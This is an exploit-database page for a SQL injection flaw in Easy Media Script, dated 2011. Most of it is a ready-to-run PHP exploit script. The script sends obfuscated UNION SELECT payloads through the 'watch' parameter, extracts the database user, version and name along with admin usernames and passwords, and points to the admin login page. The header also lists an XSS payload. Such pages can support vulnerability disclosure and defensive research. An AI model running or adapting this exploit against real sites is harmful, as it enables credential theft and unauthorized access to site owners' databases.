Easy Media Script SQL Injection

vendor:

Easy Media Script

by:

Lagripe-Dz

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Easy Media Script

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

Easy Media Script SQL Injection

This exploit allows an attacker to inject malicious SQL queries into the application. It can be used to gain access to sensitive information stored in the database.

Mitigation:

Input validation and parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

<?php

if(!$argv[1])
die("

Usage   : php exploit.php [site]
Example : php exploit.php http://site.tld/[PATH]/

");
print_r("

# Tilte......: [ Easy Media Script SQL Injection ]
# Author.....: [ Lagripe-Dz ]
# Date.......: [ 27-o5-2o11 ]
# Location ..: [ ALGERIA ]
# HoMe ......: [ Sec4Ever.com & Lagripe-Dz.org ]
# Download ..: [ http://easymediascript.com/ ]
# Gr33tz ....: [ All Sec4ever Member'z ]

                      -==[ ExPloiT ]==-

# SQL Inj : http://site/ems/?watch=1'
# XSS     : http://site/ems/?go=\"><
ScRiPt>alert(0)</ScRiPt>

                       -==[ Start ]==-

");

$t=array("db_user   "=>"user()","db_version"=>"version()","db_name
"=>"database()",
"UserName  "=>"user","Password  "=>"pass");

foreach($t as $r=>$y){

$x=@file_get_contents($argv[1]."?watch=-1'/**//**//*!uNiOn*//**//**//*!sElEcT*//**//**/1,group_concat(0x".bin2hex("<$r>").",$y,0x".bin2hex("<$r>")."),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/**//**/fRoM/**//**/ip_admin%23");

preg_match_all("{<$r>(.*?)<$r>}i",$x, $dz);

echo $u = ($dz[1][0]) ? "[-] $r  : ".$dz[1][0]."\n" : "[-] $r  : Failed
!\n";

}
echo "[-] AdminPanel  : ".$argv[1]."ip-admin/login.php\n";

print_r("
                      -==[ Finished ]==-
");

# END .. !

?>